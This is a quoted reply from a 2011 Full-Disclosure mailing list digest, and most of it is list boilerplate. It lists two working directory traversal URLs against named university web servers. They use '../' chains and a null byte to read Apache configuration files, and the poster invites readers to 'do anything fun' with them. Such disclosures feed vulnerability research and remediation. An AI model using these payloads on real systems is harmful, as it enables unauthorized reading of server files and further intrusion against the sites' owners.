> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
> >>
> >>
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
> >> -==================-
> >> Let me know if you do anything fun with 'em
> >>
> >> Luis Santana - Security+
> >> Administrator - http://hacktalk.net
> >> HackTalk Security - Security From The Underground
> >>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> > -------------- next part --------------
> > An HTML attachment was scrubbed...
> > URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/d0ac46de/attachment.html
> >
> > ------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> > End of Full-Disclosure Digest, Vol 72, Issue 44
> > ***********************************************
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/